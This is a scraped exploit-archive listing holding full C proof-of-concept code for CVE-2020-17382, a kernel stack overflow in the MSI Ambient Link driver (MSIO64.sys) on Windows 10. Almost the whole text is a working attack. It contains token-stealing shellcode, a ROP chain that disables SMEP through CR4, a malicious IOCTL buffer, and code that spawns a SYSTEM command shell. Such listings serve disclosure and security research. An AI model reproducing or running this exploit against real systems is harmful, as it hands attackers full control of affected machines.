MSI Ambient Link Driver 1.0.0.8 Privilege Escalation ≈ Packet Storm
iSpeech.org
[*]/*[*]Exploit Title: MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation[*]Date: 2020-09-24[*]Exploit Author: Matteo Malvica[*]Vendor Homepage: https://www.msi.com[*]Software Link: https://msi.gm/ABLTMNB[*]Driver: MSIO64.sys[*]SHA256: 525D9B51A80CA0CD4C5889A96F857E73F3A80DA1FFBAE59851E0F51BDFB0B6CD[*]Version: 1.0.0.8[*]Tested on: Windows 10 1709 [19041.1.amd64fre.vb_release.191206-1406][*]MSI Ambient Link Driver 1.0.0.8 Kernel Stack Based Buffer Overflow / Local Privilege Escalation[*]CVE: CVE-2020-17382[*]Writeup: https://www.matteomalvica.com/blog/2020/09/24/weaponizing-cve-2020-17382/[*]Original advisory: https://www.coresecurity.com/core-labs/advisories/msi-ambient-link-multiple-vulnerabilities[*]*/
#include
#pragma warning( disable : 6387 )
VOID eopMsio(HANDLE hFile, INT64 kernel_base, DWORD pid, DWORD IoControlCode) {[*]// SHELLCODE FOR 1709[*]BYTE token_steal[] =[*]"x65x48x8Bx14x25x88x01x00x00" // mov rdx, [gs:188h] ; Get _ETHREAD pointer from KPCR[*]"x4Cx8Bx82xB8x00x00x00" // mov r8, [rdx + b8h] ; _EPROCESS (kd> u PsGetCurrentProcess)[*]"x4Dx8Bx88xe8x02x00x00" // mov r9, [r8 + 2e8h] ; ActiveProcessLinks list head[*]"x49x8Bx09" // mov rcx, [r9] ; Follow link to first process in list[*]//find_system_proc:[*]"x48x8Bx51xF8" // mov rdx, [rcx - 8] ; Offset from ActiveProcessLinks to UniqueProcessId[*]"x48x83xFAx04" // cmp rdx, 4 ; Process with ID 4 is System process[*]"x74x05" // jz found_system ; Found SYSTEM token[*]"x48x8Bx09" // mov rcx, [rcx] ; Follow _LIST_ENTRY Flink pointer[*]"xEBxF1" // jmp find_system_proc ; Loop[*]//found_system:[*]"x48x8Bx41x70" // mov rax, [rcx + 70h] ; Offset from ActiveProcessLinks to Token[*]"x24xF0" // and al, 0f0h ; Clear low 4 bits of _EX_FAST_REF structure[*]//find cmd[*]"x48x8Bx51xF8" // mov rdx, [rcx-8] ;ActiveProcessLinks - 8 = UniqueProcessId[*]"x48x81xFAx99x99x00x00" // cmp rdx, 0d54h ;UniqueProcessId == ZZZZ? (PLACEHOLDER)[*]"x74x05" // jz found_cmd ;YES - move on[*]"x48x8Bx09" // mov rcx, [rcx] ;NO - next entry in list[*]"xEBxEE" // jmp find_cmd ;loop[*]// found cmd[*]"x48x89x41x70" // mov [rcx+70h], rax ;copy SYSTEM token over top of this process's token[*]"x48x31xc9" // xor rcx rcx ; clear some registers to avoid issues while unwinding the call stack[*]"x48x31xc0" // xor rax rax[*]"x48x31xf6" // xor rsi,rsi[*]"x48x31xff" // xor rdi, rdi[*]"x4Dx31xC0" // xor r8, r8[*]"x48xc7xc1xf8x06x15x00" // mov rcx, 0x1506f8 ; move original cr4 value into rcx[*]"xc3"; // ret ; RET
token_steal[54] = pid;[*]token_steal[55] = pid >> 8;
LPVOID allocated_shellcode = VirtualAlloc(NULL,[*]sizeof(token_steal),[*]MEM_COMMIT | MEM_RESERVE,[*]PAGE_EXECUTE_READWRITE);
memcpy(allocated_shellcode, token_steal, sizeof(token_steal));
INT64 pop_rcx_offset = kernel_base + 0x15fc70; // gadget 1 1709 - pop rcx ; ret[*]INT64 mov_cr4_offset = kernel_base + 0x76a02; // gadget 2 1709 - mov cr4, ecx ; ret[*]INT64 wbindv_offset = kernel_base + 0x1175c0;; // gadget 3 1709 - wbinvd; ret[*]INT64 rcx_value = 0x506f8; // value we want placed in cr4 in order to disable SMEP[*]INT64 rcx_old_value = 0x1506f8; // original cr4 value [*]INT64 ret = pop_rcx_offset + 1; // RET NOP
puts("[+] SMEP disabled");
BYTE input_buff[136] = { 0 };[*]memset(input_buff, 'x41', 64);[*]memset(input_buff, 'x42', 8); // dummy RBP[*]memcpy(input_buff + 72, (PINT64)&pop_rcx_offset, 8); // pop rcx[*]memcpy(input_buff + 80, (PINT64)&rcx_value, 8); // disable SMEP value[*]memcpy(input_buff + 88, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx[*]memcpy(input_buff + 96, (PINT64)&wbindv_offset, 8); // wbinvd; ret[*]memcpy(input_buff + 104, (PINT64)&allocated_shellcode, 8);// shellcode[*]memcpy(input_buff + 112, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx [*]memcpy(input_buff + 120, (PINT64)&ret, 8); // RETNOP to restore the stack[*]memcpy(input_buff + 128, (PINT64)&ret, 8); // RETNOP to restore the stack
printf("[+] Payload buffer located at: 0x%pn", &allocated_shellcode);
DWORD lpBytesReturned = 0x0;[*]BOOL triggerIOCTL = DeviceIoControl(hFile,[*]IoControlCode,[*]input_buff,[*]sizeof(input_buff),[*]NULL,[*]0,[*]&lpBytesReturned,[*]NULL);
if (!triggerIOCTL) {[*]printf("[!] DeviceIoControl failed: %dn", GetLastError());[*]}[*]else {[*]puts("[+] SMEP re-enabled");[*]puts("[+] Enjoy your SYSTEM shelln");[*]}
system("start cmd.exe");[*]}
LPVOID GetBaseAddr(const char* drvname) {[*]LPVOID drivers[1024];[*]DWORD cbNeeded;[*]int nDrivers, i = 0;
if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {[*]char szDrivers[1024];[*]nDrivers = cbNeeded / sizeof(drivers[0]);[*]for (i = 0; i < nDrivers; i++) {[*]if (GetDeviceDriverBaseNameA(drivers[i], (LPSTR)szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {[*]if (strcmp(szDrivers, drvname) == 0) {[*]return drivers[i];[*]}[*]}[*]}[*]}[*]return 0;[*]}
HANDLE GetDriverHandle() {[*]HANDLE hMsio;
hMsio = CreateFileA("\\.\MsIo",[*]FILE_READ_ACCESS | FILE_WRITE_ACCESS,[*]FILE_SHARE_READ | FILE_SHARE_WRITE,[*]NULL,[*]OPEN_EXISTING,[*]FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,[*]NULL);
if (hMsio == INVALID_HANDLE_VALUE) {[*]printf("[-] Error obtaining an handle to the driver: %dn", GetLastError());[*]exit(1);[*]}
return hMsio;[*]}
int main() {[*]puts("[*] CVE-2020-17382 - Win10 1709 - PoC by Matteo 'uf0' Malvica");[*]DWORD IoControlCode = 0x80102040;[*]HANDLE hDevice = GetDriverHandle();[*]INT64 nt = (INT64)GetBaseAddr("ntoskrnl.exe");[*]DWORD pid = GetCurrentProcessId();
eopMsio(hDevice, nt, pid, IoControlCode);
return 0;[*]}[*]
Gloss